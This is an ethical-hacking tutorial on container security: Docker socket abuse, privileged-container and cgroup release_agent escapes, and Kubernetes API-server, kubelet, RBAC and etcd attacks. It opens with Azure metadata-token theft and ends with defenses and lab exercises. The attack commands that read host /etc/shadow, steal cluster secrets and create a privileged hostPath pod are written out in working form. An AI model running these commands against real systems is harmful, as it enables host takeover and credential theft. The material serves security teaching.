Learn Ethical Hacking (#37) - Container Security - Docker and Kubernetes Attacks
What will I learn
- Container fundamentals for attackers -- namespaces, cgroups, and why containers are NOT virtual machines;
- Docker attacks -- escaping containers, exploiting the Docker socket, and image supply chain attacks;
- Kubernetes architecture -- the attack surface of a production cluster;
- Kubernetes exploitation -- RBAC misconfigurations, exposed API servers, etcd secrets, and pod escape;
- Container image attacks -- malicious base images, secrets baked into layers, and registry exploitation;
- Service mesh and network policy -- attacking and defending inter-container communication;
- Defense: pod security standards, network policies, image scanning, OPA/Gatekeeper, runtime security.
Requirements
- A working modern computer running macOS, Windows or Ubuntu;
- Docker installed locally;
- minikube or kind for Kubernetes lab exercises;
- The ambition to learn ethical hacking and security research.
Difficulty
- Intermediate
Curriculum (of the Learn Ethical Hacking series):
- Learn Ethical Hacking (#1) - Why Hackers Win
- Learn Ethical Hacking (#2) - Your Hacking Lab
- Learn Ethical Hacking (#3) - How the Internet Actually Works - For Attackers
- Learn Ethical Hacking (#4) - Reconnaissance - The Art of Not Being Noticed
- Learn Ethical Hacking (#5) - Active Scanning - Mapping the Attack Surface
- Learn Ethical Hacking (#6) - The AI Slop Epidemic - Why AI-Generated Code Is a Security Disaster
- Learn Ethical Hacking (#7) - Passwords - Why Humans Are the Weakest Cipher
- Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human
- Learn Ethical Hacking (#9) - Cryptography for Hackers - What Protects Data (and What Doesn't)
- Learn Ethical Hacking (#10) - The Vulnerability Lifecycle - From Discovery to Patch to Exploit
- Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection
- Learn Ethical Hacking (#12) - SQL Injection - The Bug That Won't Die
- Learn Ethical Hacking (#13) - SQL Injection Advanced - Extracting Entire Databases
- Learn Ethical Hacking (#14) - Cross-Site Scripting (XSS) - Injecting Code Into Browsers
- Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP
- Learn Ethical Hacking (#16) - Cross-Site Request Forgery - Making Users Attack Themselves
- Learn Ethical Hacking (#17) - Authentication Bypass - Getting In Without a Password
- Learn Ethical Hacking (#18) - Server-Side Request Forgery - Making Servers Betray Themselves
- Learn Ethical Hacking (#19) - Insecure Deserialization - Code Execution via Data
- Learn Ethical Hacking (#20) - File Upload Vulnerabilities - When Users Upload Weapons
- Learn Ethical Hacking (#21) - API Security - The New Attack Surface
- Learn Ethical Hacking (#22) - Business Logic Flaws - When the Code Works But the Logic Doesn't
- Learn Ethical Hacking (#23) - Client-Side Attacks - Beyond XSS
- Learn Ethical Hacking (#24) - Content Management Systems - Hacking WordPress and Friends
- Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards
- Learn Ethical Hacking (#26) - The Full Web Pentest - Methodology and Reporting
- Learn Ethical Hacking (#27) - Bug Bounty Hunting - Getting Paid to Hack the Web
- Learn Ethical Hacking (#28) - The AI Web Attack Surface - AI Features as Vulnerabilities
- Learn Ethical Hacking (#29) - Network Sniffing - Seeing Everything on the Wire
- Learn Ethical Hacking (#30) - Wireless Network Attacks - Breaking Wi-Fi
- Learn Ethical Hacking (#31) - Privilege Escalation - Linux
- Learn Ethical Hacking (#32) - Privilege Escalation - Windows
- Learn Ethical Hacking (#33) - Active Directory Attacks - The Crown Jewels
- Learn Ethical Hacking (#34) - Pivoting and Lateral Movement - Spreading Through Networks
- Learn Ethical Hacking (#35) - Cloud Security - AWS Attack and Defense
- Learn Ethical Hacking (#36) - Cloud Security - Azure and GCP
- Learn Ethical Hacking (#37) - Container Security - Docker and Kubernetes Attacks (this post)
Solutions to Episode 36 Exercises
Exercise 1: Azure Storage + Managed Identity attack.
# Step 1: Public blob access (anonymous, no auth)
curl "https://mylab.blob.core.windows.net/public/test.txt"
# Downloaded file contents -- anonymous access confirmed
# Step 2: From inside the VM, steal Managed Identity token
curl -H "Metadata:true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# Returns: {"access_token":"eyJ0eXAi...","expires_in":"86399",...}
# Step 3: Use token to list subscription resources
curl -H "Authorization: Bearer eyJ0eXAi..." \
"https://management.azure.com/subscriptions?api-version=2020-01-01"
# Returns full subscription list with resource groups
# Step 4: Remediation
# Disable public blob access on the storage account
az storage account update --name mylab --allow-blob-public-access false
# Scope Managed Identity to minimum required permissions
# Reader at subscription level is too broad -- restrict to specific resource group
az role assignment delete --assignee MI_PRINCIPAL_ID --role "Reader" --scope /subscriptions/SUB_ID
az role assignment create --assignee MI_PRINCIPAL_ID --role "Reader" \
--scope /subscriptions/SUB_ID/resourceGroups/specific-rg
The full attack chain demonstrates the same pattern we've seen across every cloud provider: one public access misconfiguration (the blob container) provides initial access. The metadata service (IMDS) provides credential escalation. Overly broad role assignments provide lateral movement. Each fix is independent -- disable public access on storage, restrict the Managed Identity role, enable audit logging -- and defense-in-depth means any single fix breaks a link in the chain.
Exercise 2: AzureHound relationship types (abbreviated).
Azure-specific relationships (not in on-prem SharpHound):
- AZOwns (user/SP owns Azure resource)
- AZContributor (contributor role on resource)
- AZKeyVaultContributor (can read Key Vault secrets)
- AZRunsAs (Managed Identity relationships)
- AZMemberOf (Azure AD group membership)
- AZGlobalAdmin (Global Administrator role assignment)
Top 3 dangerous misconfigs:
1. Application with high-privilege API permissions (Mail.ReadWrite.All)
2. Overprivileged Managed Identities (Contributor at subscription scope)
3. Guest users with elevated roles
Key difference vs on-prem: Azure attack paths often go through
Application Registrations and Service Principals, which have no
direct on-prem equivalent. On-prem paths chain through group
memberships and ACLs. Azure paths chain through app permissions,
role assignments, and service principal ownerships.
The fundamental insight from AzureHound is that Azure AD attack paths are structurally different from on-prem AD paths. In on-prem AD (episode 33), you chain through group memberships, delegation rights, and ACL misconfigurations. In Azure AD, you chain through application permissions, role assignments, and managed identity relationships. When you import BOTH datasets into BloodHound, the hybrid paths -- on-prem to cloud and back -- are often the most dangerous because they cross security domain boundaries that no single team typically monitors.
Exercise 3: Cloud metadata comparison table.
AWS Azure GCP
Endpoint 169.254.169.254 169.254.169.254 metadata.google.internal
Auth None (v1)/Token (v2) Metadata:true header Metadata-Flavor:Google
Creds IAM role temp keys OAuth access token OAuth access token
SSRF prot IMDSv2 (PUT+token) Header requirement Header requirement
Defense Enforce IMDSv2 Managed Identity Workload Identity Fed
Most resilient to custom-header SSRF: AWS with IMDSv2 enforced.
IMDSv2 requires a PUT request to get a session token, then uses
that token in subsequent GET requests. Even SSRF with custom headers
cannot issue the initial PUT in most cases. Azure and GCP both
fall to any SSRF that can set custom headers.
AWS with IMDSv2 enforced is the most resilient because it requires a two-step process -- a PUT to get a session token, then a GET with that token. Most SSRF vulnerabilities that allow custom headers can only issue GET or POST requests, not PUT. Azure and GCP both rely on a single required header (Metadata:true and Metadata-Flavor: Google respectively), which any SSRF that supports custom headers will bypass. The lesson: a header requirement is better than nothing (blocks basic GET-only SSRF), but a separate token-acquisition step is stronger.
Learn Ethical Hacking (#37) - Container Security - Docker and Kubernetes Attacks
Episodes 35 and 36 covered cloud security across AWS, Azure, and GCP -- IAM privilege escalation, public storage buckets, metadata services, credential theft, and the tools that map attack paths across multi-cloud environments. You can now enumerate cloud environments with ScoutSuite and Prowler, exploit overpermissive IAM policies, steal credentials via SSRF against metadata endpoints, and understand why the shared responsibility model means most breaches are the customer's fault.
But here is the thing about modern cloud deployments: when an organization says "we're on AWS" or "we're running in Azure," what they increasingly mean is "we're running Docker containers orchestrated by Kubernetes on EKS/AKS/GKE." The actual workloads running inside those cloud environments are containerized. And containers introduce their own security model -- their own isolation boundaries, their own identity systems, their own networking, their own secret management -- layered on TOP of the cloud provider's model.
More layers means more complexity. More complexity means more misconfigurations. More misconfigurations means more attack surface. You know how this goes by now ;-)
Containers Are Not Virtual Machines
This is the single most important thing to understand about container security, and I cannot stress this enough: containers are NOT virtual machines. The mental model that most developers have -- "a container is like a lightweight VM" -- is dangerously wrong from a security perspective, and it leads to assumptions about isolation that simply do not hold.
A virtual machine has its own kernel. Its own operating system. Its own memory space. A hypervisor mediates every interaction between the guest and the host hardware. To escape a VM, you need to exploit a vulnerability in the hypervisor itself -- a genuinely hard problem (though not impossible, as Pwn2Own entries have demonstrated).
A container shares the host kernel. It uses Linux namespaces for isolation (separate PID, network, mount, user, and IPC spaces) and cgroups for resource limits (CPU, memory, I/O). The container process is just a regular process on the host, running with some restrictions applied by the kernel. There is no hypervisor. There is no separate kernel. The isolation is enforced by kernel features, not by a hardware boundary.
The security implication: if you escape a container, you are directly on the host. There is no hypervisor layer to break through. Container escape equals host compromise. And because Kubernetes clusters typically run many pods on the same node, escaping one container can give you access to every other container on that node -- plus the node itself, which likely has credentials for the Kubernetes API, cloud provider metadata, and secrets for dozens of other workloads.
# Check what kernel you're running inside a container
uname -r
# 6.1.0-18-amd64
# This is the HOST kernel -- there is no guest kernel
# Check the cgroup for the current process
cat /proc/1/cgroup
# 0::/system.slice/docker-abc123.scope
# The process lives in a cgroup controlled by Docker
# Check the namespace ID
ls -la /proc/1/ns/
# Shows: cgroup, ipc, mnt, net, pid, user, uts
# Each is a namespace restriction, NOT a VM boundary
I've seen pentest reports where the tester wrote "container isolated, no further access possible" because they treated the container like a VM. They ran a few basic commands, found they couldn't see the host filesystem, and concluded the isolation was adequate. They didn't check for mounted sockets. They didn't check for privileged mode. They didn't check for misconfigured capabilities. Container isolation is only as strong as its configuration, and the default configuration in many environments is far weaker than people assume.
The Docker Socket -- The Keys to the Kingdom
If there is one single vulnerability pattern you remember from this episode, make it this one. The Docker socket (/var/run/docker.sock) is the API endpoint that controls the Docker daemon. Whoever has access to this socket can create containers, start them, stop them, exec into them, and -- critically -- create containers with full access to the host filesystem.
The problem: developers and CI/CD pipelines routinely mount the Docker socket INTO containers. Jenkins needs to build Docker images? Mount the socket. A monitoring tool needs to inspect running containers? Mount the socket. A deployment tool needs to pull and start new containers? Mount the socket. Every one of these creates a trivial escape path:
# Check if docker.sock is mounted inside your container
ls -la /var/run/docker.sock
# srw-rw---- 1 root docker 0 May 25 /var/run/docker.sock
# If this file exists: game over
# Use the Docker API directly via curl
# List all containers on the host
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json | python3 -m json.tool
# Create a new container with the host filesystem mounted
curl -s --unix-socket /var/run/docker.sock \
-X POST http://localhost/containers/create \
-H "Content-Type: application/json" \
-d '{"Image":"alpine","Cmd":["/bin/sh","-c","cat /hostfs/etc/shadow"],"Binds":["/:/hostfs"],"Privileged":true}'
# Returns: {"Id":"CONTAINER_ID"}
# Start the container
curl -s --unix-socket /var/run/docker.sock \
-X POST http://localhost/containers/CONTAINER_ID/start
# Read the output -- you now have /etc/shadow from the HOST
curl -s --unix-socket /var/run/docker.sock \
http://localhost/containers/CONTAINER_ID/logs?stdout=true
This is the same concept from episode 31 (Docker group privilege escalation on Linux) but from inside a container. The principle is identical: access to the Docker API = root on the host. The Docker socket is the API. If it's mounted inside a container, anyone with code execution in that container can escape.
Having said that, I want to make clear that mounting the Docker socket is sometimes genuinely necessary -- CI/CD systems like Jenkins really do need to build images, and the alternatives (Docker-in-Docker with --privileged, running a separate Docker daemon, using Kaniko or Buildah for rootless builds) each have their own tradeoffs. The problem is not that the socket is ever mounted -- it's that it's mounted without understanding the security implication, and without compensating controls (read-only access, restricted API proxy, dedicated build nodes isolated from production).
Container Escape via Privileged Mode
Containers started with --privileged have almost no isolation from the host. The --privileged flag essentially disables all the security restrictions that make a container a container: it grants ALL Linux capabilities, it gives access to ALL host devices, it disables AppArmor and SELinux restrictions, and it allows mounting the host filesystem:
# Check if you're running in a privileged container
cat /proc/1/status | grep CapEff
# Privileged: 000001ffffffffff (all capabilities)
# Normal: 00000000a80425fb (limited set)
# If privileged, mount the host filesystem directly
mkdir /tmp/hostfs
mount /dev/sda1 /tmp/hostfs
ls /tmp/hostfs
# bin boot dev etc home lib ...
# That's the entire host filesystem
# Read sensitive host files
cat /tmp/hostfs/etc/shadow
cat /tmp/hostfs/root/.ssh/id_rsa
cat /tmp/hostfs/root/.bash_history
There's also the cgroup escape technique, which works in some privileged containers even when the filesystem is not directly mountable. This exploit abuses the release_agent mechanism in cgroups to execute arbitrary commands on the host:
# Cgroup release_agent escape (requires privileged container)
# Create a temp cgroup
mkdir /tmp/cgrp
mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/escape
# Set up the escape
echo 1 > /tmp/cgrp/escape/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Write the command to execute on the host
echo '#!/bin/sh' > /cmd
echo "id > $host_path/output" >> /cmd
chmod +x /cmd
# Trigger the escape by writing to cgroup.procs
sh -c "echo \$\$ > /tmp/cgrp/escape/cgroup.procs"
# Read the output
cat /output
# uid=0(root) gid=0(root) groups=0(root)
# That's root on the HOST, not inside the container
Why does --privileged get used? The same reason "Action": "*", "Resource": "*" gets used in IAM policies (episode 35): it's the fastest way to make something work. Developer needs GPU access in a container? --privileged. Need to run systemd inside a container? --privileged. Need network debugging tools that require raw sockets? --privileged. Every one of these has a narrower solution -- specific device access, specific capabilities, specific sysctl settings -- but --privileged is one flag and it works immediately.
Secrets in Container Images
Docker images are layered. Every RUN, COPY, or ADD instruction in a Dockerfile creates a new layer. Here's the security problem: if a secret was added in one layer and deleted in a later layer, it still exists in the image history. Docker images are like git repositories -- nothing is truly deleted, it's just no longer visible in the current state.
# Inspect image layers -- see every command that built the image
docker history target-image:latest
# IMAGE CREATED CREATED BY SIZE
# abc123 2 days ago CMD ["python" "app.py"] 0B
# def456 2 days ago RUN rm /app/credentials.json 0B
# ghi789 2 days ago COPY credentials.json /app/ 145B
# jkl012 2 days ago RUN pip install -r requirements.txt 89.2MB
# ...
# Notice: credentials.json was COPIED and then DELETED
# The deletion layer (def456) removes it from the current view
# But the COPY layer (ghi789) still contains the file
# Extract ALL layers and search for secrets
docker save target-image:latest -o image.tar
tar xf image.tar
find . -name "layer.tar" -exec tar -tf {} \; | grep -iE "password|secret|key|token|\.env|credentials"
# Or use dive for interactive layer inspection
dive target-image:latest
# Navigate through each layer, see exactly what files were added/modified/deleted
This is not a theoretical risk. I've pulled production images from Docker Hub and found AWS access keys, database passwords, TLS private keys, and API tokens baked into layers that were supposedly cleaned up in later build steps. The correct approach is to NEVER put secrets in a Dockerfile -- use build arguments for build-time secrets (though those are visible in docker history too), or better yet, inject secrets at runtime via environment variables or a secrets manager.
Trivy and Grype scan images for known vulnerabilities in installed packages, and also detect common secret patterns in image layers:
# Scan an image for vulnerabilities AND secrets
trivy image --scanners vuln,secret nginx:latest
# Shows CVEs by severity + any detected secrets in layers
# Compare vulnerability counts across image variants
trivy image nginx:latest # Debian-based, many packages
trivy image nginx:alpine # Alpine-based, minimal packages
trivy image nginx:1.25-alpine # Pinned version, minimal packages
# Alpine variants typically have 80-90% fewer vulnerabilities
# because they contain fewer installed packages to have CVEs in
Kubernetes -- The Orchestration Attack Surface
If Docker is about running individual containers, Kubernetes (K8s) is about orchestrating thousands of them. And Kubernetes adds a MASSIVE attack surface on top of Docker. A K8s cluster has:
- API Server (port 6443) -- the control plane, manages everything
- etcd (port 2379) -- the database storing ALL cluster state including secrets
- kubelet (port 10250) -- agent on each node, runs pods
- kube-proxy -- handles network routing between services
- Pods, Services, Secrets, ConfigMaps, ServiceAccounts -- all your targets
Every one of these components is a potential attack vector when misconfigured. And Kubernetes misconfiguration is extremely common because the default settings are designed for ease of getting started, not for security. Sound familiar? It's the same pattern as cloud IAM policies (episode 35), Azure AD tenant defaults (episode 36), and basically every other system we've covered in this entire series.
Exposed API Server
The Kubernetes API server is the front door to the entire cluster. If it's accessible from the internet without authentication (or with anonymous auth enabled), you can read every secret, create pods, modify deployments, and effectively own the entire cluster:
# Check if the API server is accessible without auth
curl -k https://TARGET:6443/api
# If returns JSON with "kind":"APIVersions" -- API is exposed
# List all namespaces
curl -k https://TARGET:6443/api/v1/namespaces
# Read ALL secrets in ALL namespaces (the jackpot)
curl -k https://TARGET:6443/api/v1/secrets
# Returns base64-encoded secrets for every service in the cluster
# Database passwords, API keys, TLS certificates, service tokens
# If kubectl is available:
kubectl --server=https://TARGET:6443 --insecure-skip-tls-verify \
get secrets --all-namespaces -o json
Anonymous authentication on the API server is rare in modern clusters (disabled by default since K8s 1.6), but it still shows up in test environments that get promoted to production, in clusters deployed with permissive Ansible/Terraform templates, and in managed Kubernetes services where the admin assumed "private network" meant "secure."
Kubelet API -- Direct Pod Execution
The kubelet runs on every node and manages the pods on that node. Its API (port 10250) lets you list pods and execute commands inside them. If the kubelet API is exposed without authentication, you can execute commands in ANY pod on that node:
# Check if kubelet API is accessible
curl -k https://NODE_IP:10250/pods
# Returns JSON listing every pod on this node
# Execute a command in a specific pod
curl -k -X POST \
"https://NODE_IP:10250/run/NAMESPACE/POD_NAME/CONTAINER_NAME" \
-d "cmd=cat /etc/shadow"
# Enumerate all pods and look for interesting containers
curl -k https://NODE_IP:10250/pods | python3 -c "
import sys,json
pods = json.load(sys.stdin)['items']
for pod in pods:
ns = pod['metadata']['namespace']
name = pod['metadata']['name']
for c in pod['spec']['containers']:
print(f'{ns}/{name}/{c[\"name\"]}')
"
This is often more useful than the API server attack because even clusters with properly secured API servers sometimes leave the kubelet API open. Network policies (if they exist at all) typically focus on pod-to-pod communication, not on restricting access to the kubelet port.
RBAC Misconfigurations -- The Cloud IAM Parallel
Kubernetes has its own role-based access control system, and it suffers from the same problems as cloud IAM. The most common RBAC misconfigurations:
# From inside a pod, check what your service account can do
kubectl auth can-i --list
# If you see: Resources: [*], Verbs: [*]
# That's cluster-admin -- you own the cluster
# Common misconfigurations:
# 1. Default service account with cluster-admin
# 2. Wildcard permissions: verbs=["*"] resources=["*"]
# 3. Ability to create pods (= ability to escape to the node)
# 4. Access to secrets in other namespaces
# 5. Permission to exec into pods (= code execution everywhere)
# If you can create pods, create a privileged one:
cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: pwned
spec:
containers:
- name: pwn
image: alpine
command: ["/bin/sh", "-c", "sleep 999999"]
securityContext:
privileged: true
volumeMounts:
- name: hostfs
mountPath: /hostfs
volumes:
- name: hostfs
hostPath:
path: /
automountServiceAccountToken: false
EOF
kubectl exec -it pwned -- chroot /hostfs /bin/bash
# Root on the node
The create pods permission in Kubernetes is equivalent to iam:PassRole in AWS (episode 35) or iam.serviceAccounts.actAs in GCP (episode 36). It sounds innocuous -- "allow this service account to create pods." But a pod can mount the host filesystem, run as privileged, mount secrets from any namespace, and use the node's cloud provider credentials via the metadata service. The ability to create a pod IS the ability to own the node. And by extension, if the node has access to the cloud metadata service (which it almost always does), creating a pod is a path to cloud account compromise.
This is the layering problem in action: Kubernetes RBAC sits on top of cloud IAM, which sits on top of Linux permissions. A single misconfiguration in the Kubernetes layer cascades through Docker isolation and into the cloud layer beneath it.
Secrets from etcd -- The Cluster's Crown Jewels
etcd is the key-value store that backs the entire Kubernetes cluster. Every piece of cluster state -- every pod definition, every secret, every config map, every role binding -- lives in etcd. If you can access etcd directly, you can read (and modify) everything:
# If etcd is accessible (port 2379, no client cert required)
# List all secret keys
ETCDCTL_API=3 etcdctl --endpoints=https://TARGET:2379 \
--insecure-skip-tls-verify --insecure-transport \
get /registry/secrets --prefix --keys-only
# Read a specific secret
ETCDCTL_API=3 etcdctl --endpoints=https://TARGET:2379 \
--insecure-skip-tls-verify --insecure-transport \
get /registry/secrets/default/my-secret
# Secrets in etcd are base64-encoded by default, NOT encrypted
# Unless encryption-at-rest is explicitly configured
echo "BASE64_VALUE_HERE" | base64 -d
The encryption-at-rest situation for Kubernetes secrets is remarkably similar to the etcd problem in on-prem AD (episode 33) where ntds.dit contains all domain password hashes. etcd IS the ntds.dit of Kubernetes. By default, secrets in etcd are stored as base64 -- which is encoding, NOT encryption. Anyone with access to etcd can read every secret in the cluster. Encryption at rest is available and documented, but it requires explicit confguration and many clusters don't have it enabled.
Container Image Supply Chain
The supply chain attack surface for containers is enormous. Docker Hub hosts millions of images, and developers pull them without thinking twice. A malicious or compromised base image affects every container built on top of it:
# Pull an image and scan for vulnerabilities
trivy image nginx:latest
# CRITICAL: 12 HIGH: 45 MEDIUM: 89 LOW: 67
# Common supply chain attacks:
# 1. Typosquatting: ngnix instead of nginx, mongodp instead of mongodb
# 2. Malicious official-looking images with crypto miners
# 3. Compromised base images (the xz/liblzma supply chain attack)
# 4. Outdated images with known CVEs never patched
# Always use specific version tags, NEVER :latest in production
# Bad: FROM nginx:latest
# Good: FROM nginx:1.25.4-alpine@sha256:abc123...
# The digest pin (@sha256:...) ensures the exact image content
# Verify image signatures with cosign
cosign verify --key cosign.pub myregistry.io/myimage:v1.0
The :latest tag deserves special mention. In development, pulling :latest is convenient -- you always get the newest version. In production, it means you have no idea what you're actually running. The image behind :latest can change at any time -- the registry owner pushes a new version and every deployment that pulls :latest gets different code on the next restart. For a public image, this means an attacker who compromises the registry account can push a malicious image as :latest and every cluster pulling that image will run the attacker's code on the next pod restart. Pin your images. Use digest references. Verify signatures. This is the container equivalent of pinning dependency versions instead of using * in your package.json.
Service Mesh and Network Policies
By default, Kubernetes networking is completely flat: every pod can talk to every other pod in the cluster. There is no network segmentation. A compromised pod in the development namespace can reach services in the production namespace. This is the equivalent of putting every server on the same VLAN with no firewall rules (remember network segmentation from episode 34?).
# Default state: NO network policies = everything talks to everything
# This is the Kubernetes equivalent of "any any permit"
# Fix: Default-deny NetworkPolicy
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: default-deny-all
namespace: production
spec:
podSelector: {}
policyTypes:
- Ingress
- Egress
# With no ingress/egress rules specified,
# ALL traffic to/from pods in this namespace is denied
# Then whitelist only what's needed
# Example: allow only the frontend to talk to the backend
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: allow-frontend-to-backend
namespace: production
spec:
podSelector:
matchLabels:
app: backend
policyTypes:
- Ingress
ingress:
- from:
- podSelector:
matchLabels:
app: frontend
ports:
- port: 8080
protocol: TCP
Service meshes like Istio and Linkerd add another layer on top of network policies: mutual TLS between pods (every inter-service connection is encrypted and authenticated), fine-grained traffic policies, and observability. But they also add complexity -- and as we've established throughout this series, complexity is the enemy of security. A misconfigured Istio sidecar proxy can actually WEAKEN security by providing an additional attack surface. Only deploy a service mesh if you have the operational maturity to configure and maintain it correctly.
Defense: Securing Containers and Kubernetes
# 1. Pod Security Standards (PSS) -- enforce restricted profile
# This replaces the deprecated PodSecurityPolicy
apiVersion: v1
kind: Namespace
metadata:
name: production
labels:
pod-security.kubernetes.io/enforce: restricted
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/audit: restricted
# The "restricted" profile prevents:
# - Privileged containers
# - Host networking, host PID, host IPC
# - Privilege escalation (allowPrivilegeEscalation: false)
# - Running as root
# - Writable root filesystem
# - Most Linux capabilities
# 2. NEVER mount docker.sock into containers
# Use Kaniko or Buildah for rootless image builds in CI/CD
# If you MUST mount the socket, use a restricted API proxy like
# Tecnativa/docker-socket-proxy that only allows specific API calls
# 3. NEVER run containers as --privileged
# Use specific capabilities instead:
# docker run --cap-add NET_ADMIN (instead of --privileged)
# docker run --device /dev/fuse (instead of --privileged)
# 4. Scan ALL images before deployment
# In CI/CD pipeline:
trivy image --exit-code 1 --severity CRITICAL myimage:v1.0
# Fail the pipeline if critical vulnerabilities are found
# 5. Enable etcd encryption at rest
# In kube-apiserver configuration:
# --encryption-provider-config=/path/to/encryption-config.yaml
# 6. Use OPA/Gatekeeper for policy enforcement
# Gatekeeper is a Kubernetes admission controller that evaluates
# pods against policies BEFORE they're created
# Example: deny any pod requesting privileged mode
# 7. Enable audit logging on the API server
# --audit-log-path=/var/log/kubernetes/audit.log
# --audit-policy-file=/etc/kubernetes/audit-policy.yaml
# 8. Use distroless or scratch base images
# FROM gcr.io/distroless/static:nonroot
# No shell, no package manager, no utilities
# An attacker who gets RCE can't even run 'ls' or 'cat'
# 9. Runtime security monitoring (Falco)
# Falco watches system calls and alerts on suspicious activity:
# - Shell spawned inside container
# - Sensitive file read (/etc/shadow, /etc/passwd)
# - Network connection to unexpected destination
# - Binary executed that wasn't in the original image
The distroless approach deserves highlighting because it flips the container security model on its head. Instead of building a full OS image and then trying to restrict what an attacker can do, you build an image with NOTHING except your application binary. No shell. No package manager. No curl. No wget. No cat. An attacker who achieves remote code execution inside a distroless container cannot do much with it -- there are no tools to use for reconnaissance, no shell to execute commands, no utilities to exfiltrate data. It doesn't prevent all attacks (they can still make network connections, read files through the application runtime), but it dramatically reduces the blast radius of a compromise.
The AI Slop Connection
Container security is where the AI code generation problem hits especially hard. Developers ask AI assistants for help with Kubernetes manifests and Docker configurations, and the suggestions are consistently insecure:
securityContext: privileged: truebecause "the container needs access to the GPU"- Mounting
docker.sockbecause "the CI/CD pipeline needs to build images" serviceAccountName: defaultwith cluster-admin binding because "the app needs to access the API"FROM ubuntu:latestinstead of pinned distroless images because it's "easier to debug"- Kubernetes Secrets in plaintext YAML committed to git because "kubectl apply needs them"
The pattern is identical to what we saw with cloud IAM in episodes 35 and 36: the AI generates the simplist configuration that works, and the simplest configuration is the most permissive one. A securityContext with privileged: true, runAsRoot: true, and allowPrivilegeEscalation: true is four lines of YAML. The secure alternative -- specific capabilities, non-root user, read-only filesystem, resource limits, seccomp profile -- is twenty lines. The AI optimizes for brevity. Security requires verbosity.
The Bigger Picture
Container security is not a separate discipline -- it's the intersection of everything we've covered. Linux privilege escalation (episode 31) maps directly to container escape techniques. Network segmentation (episode 34) maps to Kubernetes network policies. Cloud IAM (episodes 35-36) maps to Kubernetes RBAC. Supply chain attacks map to container image security. And the metadata service attacks we covered in cloud episodes work exactly the same from inside a Kubernetes pod running on a cloud node -- curl http://169.254.169.254/... from a pod on an EKS node gives you the node's IAM role credentials.
The trend is clear: every layer of abstraction adds security surface. Physical servers had OS-level security. Virtual machines added hypervisor security. Cloud platforms added IAM and API security. Containers added image and runtime security. Kubernetes added orchestration and RBAC security. Each layer is supposed to provide isolation, and each layer introduces new ways that isolation can fail.
The next episodes will move into infrastructure-as-code and automation security -- because the YAML files and Terraform modules that deploy all these containers and cloud resources are themselves an attack surface. If you can compromise the CI/CD pipeline that deploys Kubernetes manifests, you don't need to escape a container or exploit an IAM policy. You just modify the deployment to include your backdoor, and the automation delivers it to production for you.
Exercises
Exercise 1: Create a deliberately vulnerable Docker scenario: run a container with /var/run/docker.sock mounted as a volume (docker run -v /var/run/docker.sock:/var/run/docker.sock -it alpine sh). From inside the container, use the Docker API via curl to (a) list all containers on the host, (b) create a new privileged container with the host filesystem mounted at /hostfs, (c) start that container and verify you can read /etc/shadow from the host. Then remove the socket mount and verify the escape is no longer possible. Document the full attack chain and explain why CI/CD containers that mount the socket are high-value targets.
Exercise 2: Set up a minikube cluster. Create a pod with an overprivileged service account (bind the cluster-admin ClusterRole to the default ServiceAccount in the default namespace). From inside the pod, use kubectl to list all secrets in all namespaces. Then create proper RBAC: a new ServiceAccount with a Role that only allows reading ConfigMaps in its own namespace. Verify the restricted account cannot access secrets or resources in other namespaces. Document the RBAC configuration and explain why the create pods permission is equivalent to node-level access.
Exercise 3: Pull 3 popular Docker images (nginx:latest, node:latest, python:latest) and scan them with Trivy. Document: (a) total vulnerabilities per image broken down by severity (critical, high, medium, low), (b) the most severe CVE in each image and what it affects, (c) which vulnerabilities have fixes available. Then compare nginx:latest vs nginx:alpine vs nginx:1.25-alpine -- document the vulnerability count reduction. Save your analysis to ~/lab-notes/container-vuln-scan.md.